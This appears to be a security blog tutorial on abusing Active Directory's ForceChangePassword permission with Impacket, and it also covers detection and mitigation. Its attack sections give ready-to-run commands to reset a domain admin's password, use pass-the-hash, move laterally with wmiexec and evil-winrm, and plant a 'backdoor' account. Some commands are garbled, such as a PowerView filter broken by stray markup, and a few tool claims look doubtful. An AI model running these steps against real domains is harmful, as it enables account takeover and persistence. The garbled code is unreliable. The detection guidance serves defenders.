Listen to this Post

Introduction:
Active Directory (AD) misconfigurations are a goldmine for attackers, and the ForceChangePassword delegated permission is one of the most commonly overlooked flaws. By abusing this right with Impacket’s `changepasswd` tool, an attacker can reset any user’s password without knowing the current credentials, leading to immediate account takeover, privilege escalation, and lateral movement across the domain.
Learning Objectives:
- Understand how the ForceChangePassword permission works and why it poses a critical security risk.
- Execute a password change attack using Impacket from a Linux attacker machine.
- Detect the abuse via Windows event logs and implement mitigation strategies to harden AD permissions.
You Should Know:
1. Understanding ForceChangePassword Permission and Its Abuse
This permission is part of Active Directory’s delegated rights model. When an object (user or group) is granted the `ForceChangePassword` extended right on a target user, they can reset that user’s password without providing the old one. Attackers who compromise an account with such delegation can instantly take over any user, especially privileged ones like domain admins.
Step‑by‑step guide to enumerate this weakness:
- On a Windows domain-joined machine (as a low-privilege user), use `dsacls` to check for ForceChangePassword rights:
dsacls "CN=TargetUser,CN=Users,DC=domain,DC=com" | findstr "ForceChangePassword"
- Alternatively, use PowerView (part of PowerSploit):
Import-Module .\PowerView.ps1 Get-DomainObjectAcl -Identity TargetUser -ResolveGUIDs | Where-Object {$<em>.ActiveDirectoryRights -like "ExtendedRight" -and $</em>.ObjectAceType -like "ForceChangePassword"} - From Linux, with impacket’s `findDelegation.py` (or
bloodhound.py), you can map all users who have this right.
The output will show which principals have the right. If a non‑administrative account appears, it’s a major attack path.
2. Setting Up Impacket Environment for the Attack
Impacket is a collection of Python classes for working with network protocols. The `impacket-changepasswd` script (also named changepasswd.py) is specifically built to abuse the `ForceChangePassword` right over SMB/RPC.
Step‑by‑step installation and configuration:
- On a Kali Linux or any Debian-based system:
sudo apt update && sudo apt install impacket-scripts Or install from source: git clone https://github.com/SecureAuthCorp/impacket.git cd impacket sudo python3 setup.py install
- Verify installation:
changepasswd.py -h
- Ensure you have network connectivity to the Domain Controller (DC) on ports 445 (SMB) and 135 (RPC). Use `nmap` to check:
nmap -p 135,445 <DC-IP>
- You also need valid credentials for an account that has the ForceChangePassword right (obtained via previous enumeration or phishing). If you have NTLM hash instead of clear text, Impacket can use pass‑the‑hash.
3. Performing the Password Change Attack with Impacket
Once you have an account (e.g., lowpriv_user) that can force a change on admin_user, execute the attack.
Step‑by‑step guide:
- Basic command syntax:
changepasswd.py domain.com/lowpriv_user:password@<DC-IP> -newpass NewP@ssw0rd! -target admin_user
- If you have an NTLM hash (pass‑the‑hash):
changepasswd.py domain.com/lowpriv_user@<DC-IP> -hashes <LMhash:NThash> -newpass NewP@ssw0rd! -target admin_user
- Example output indicates success: `[] Password changed successfully!`
– Now, you can authenticate as `admin_user` using `NewP@ssw0rd!` with any tool (e.g.,psexec.py,wmiexec.py, RDP). - For lateral movement, use
wmiexec.py:wmiexec.py domain.com/admin_user:NewP@ssw0rd!@<Target-IP>
This grants you immediate interactive shell access on a remote machine. If the target was a Domain Admin, you have essentially owned the entire domain.
4. Detecting the Attack via Windows Event Logs
Defenders need to recognize when a password change occurs without prior authentication or from unexpected sources.
Step‑by‑step detection guide:
- On the Domain Controller, enable auditing for “User Account Management” (GPO: Computer Configuration → Windows Settings → Security Settings → Advanced Audit Policy → Audit User Account Management).
- Look for Event ID 4724 (An attempt was made to reset an account’s password). Key fields to inspect:
Subject Account Name: the account that performed the reset.Target Account Name: the account whose password was reset.
– `Caller Process Name` and `Workstation Name` – often show a remote source (e.g.,\\<Attacker-IP>).- Additionally, Event ID 4648 (A logon was attempted using explicit credentials) may precede the reset.
- Use PowerShell to hunt for anomalous resets:
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4724} | Where-Object {$_.Message -like "lowpriv_user"} | Format-List - SIEM rules should flag password resets performed by non‑administrators, especially those followed by immediate logons from the same source IP.
5. Mitigation and Hardening AD Permissions
The root cause is overly permissive delegation. Removing unnecessary ForceChangePassword rights is the primary fix.
Step‑by‑step mitigation guide:
- Identify all ForceChangePassword ACEs across the domain using PowerView:
Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.ObjectAceType -eq "ForceChangePassword"} | select ObjectDNP, ActiveDirectoryRights, SecurityIdentifier - Convert SIDs to names:
Convert-SidToName <SID>
- For each dangerous ACE, remove the right using `dsacls` (run as Domain Admin):
dsacls "CN=TargetUser,CN=Users,DC=domain,DC=com" /remove "DOMAIN\OffendingUser" /G "ForceChangePassword"
- Alternatively, use Active Directory Users and Computers (ADUC): open user properties → Security → Advanced → select the offending entry → Edit → uncheck “Change password”.
- Implement the principle of least privilege: delegate only “Reset Password” to helpdesk groups on specific OUs, and never to ordinary users.
- Use AdminSDHolder protection for privileged accounts; consider Protected Users group to prevent NTLM-based attacks.
6. Advanced Exploitation: Combining with Other Attack Techniques
Attackers rarely stop at a single password change. Combining ForceChangePassword with other misconfigurations amplifies damage.
Step‑by‑step guide for red team simulation:
- After changing a user’s password, check if that user has Remote Desktop rights:
evil-winrm -i <Target-IP> -u admin_user -p NewP@ssw0rd!
- Dump credentials from memory using `mimikatz` or `procdump` + `mimikatz` to harvest more hashes.
- Use the new credentials to enumerate further AD delegation (e.g., AdminSDHolder, GPO rights, unconstrained delegation).
- For persistence, add a new user or modify service accounts:
python3 adduser.py domain.com/admin_user:NewP@ssw0rd!@<DC-IP> -user backdoor -pass Evil123!
- Abuse SMB/RPC mismanagement: if the compromised user had `GenericAll` rights on another object, you can perform a resource‑based constrained delegation (RBCD) attack.
- Using Windows Native Tools for Similar Effect (Without Impacket)
If you are on a Windows attack host (e.g., after gaining initial foothold), you can abuse ForceChangePassword without Impacket.
Step‑by‑step guide using native tools:
- Install AD RSAT tools (if not present):
Add-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 -Online
- Use `Set-ADAccountPassword` (requires ActiveDirectory module):
$newpass = ConvertTo-SecureString "NewP@ssw0rd!" -AsPlainText -Force Set-ADAccountPassword -Identity admin_user -NewPassword $newpass -Reset
- If you have an NTLM hash, first obtain a Kerberos ticket using `runas /netonly` or `sekurlsa::pth` from Mimikatz:
runas /netonly /user:domain.com\lowpriv_user cmd
- Inside that session, execute the password reset command. This bypasses the need for clear‑text password.
- For enumeration, `net` commands:
net user lowpriv_user /domain
- Use `adfind` (free tool) to query ACLs:
adfind -b "DC=domain,DC=com" -f "(objectClass=user)" -sdnacl -sddlfilter -p "ForceChangePassword" -csv
What Undercode Say:
- ForceChangePassword is a critical AD misconfiguration that is often overlooked during security assessments, yet it provides a direct path to privilege escalation without any exploit – it’s a feature abused as a bug.
- Detection requires proactive logging and behavior analytics; simply relying on native Windows auditing may miss the attack if not configured correctly, and defenders should build SIEM rules correlating password resets with unusual source IPs or accounts.
Impacket’s `changepasswd` is a powerful tool for red teams, but also a stark reminder for blue teams to review delegated permissions. The ease of resetting any user’s password – from domain admin to service accounts – means that one compromised low‑privileged helpdesk account can lead to full domain compromise within minutes. Organizations must regularly run tools like BloodHound to visualize attack paths and remediate over‑delegation. Additionally, enabling and monitoring Event ID 4724, restricting NTLM usage, and implementing authentication policies like “Smart Card required for interactive logon” on privileged accounts drastically reduce risk. Remember: AD delegation is an ACL chain – one broken link can hand attackers the keys to the kingdom.
Prediction:
Within the next 12–18 months, we expect to see a surge in ransomware groups weaponizing ForceChangePassword abuses as an initial access vector, especially targeting managed service providers (MSPs) that still use over‑delegated helpdesk accounts. As Microsoft pushes cloud‑native solutions like Azure AD, on‑prem AD misconfigurations will become the “shadow IT” weak spot. AI‑driven attack path management tools will automate enumeration of such rights, forcing defenders to adopt zero‑trust identity protection – including time‑based just‑in‑time (JIT) delegation and mandatory password change approvals via privileged access workstations (PAWs). The cat‑and‑mouse game will shift from exploiting the permission to detecting unnatural reset patterns through UEBA, but for now, manual AD review remains the only reliable safeguard.
▶️ Related Video (84% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Shubham Sharmaa – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


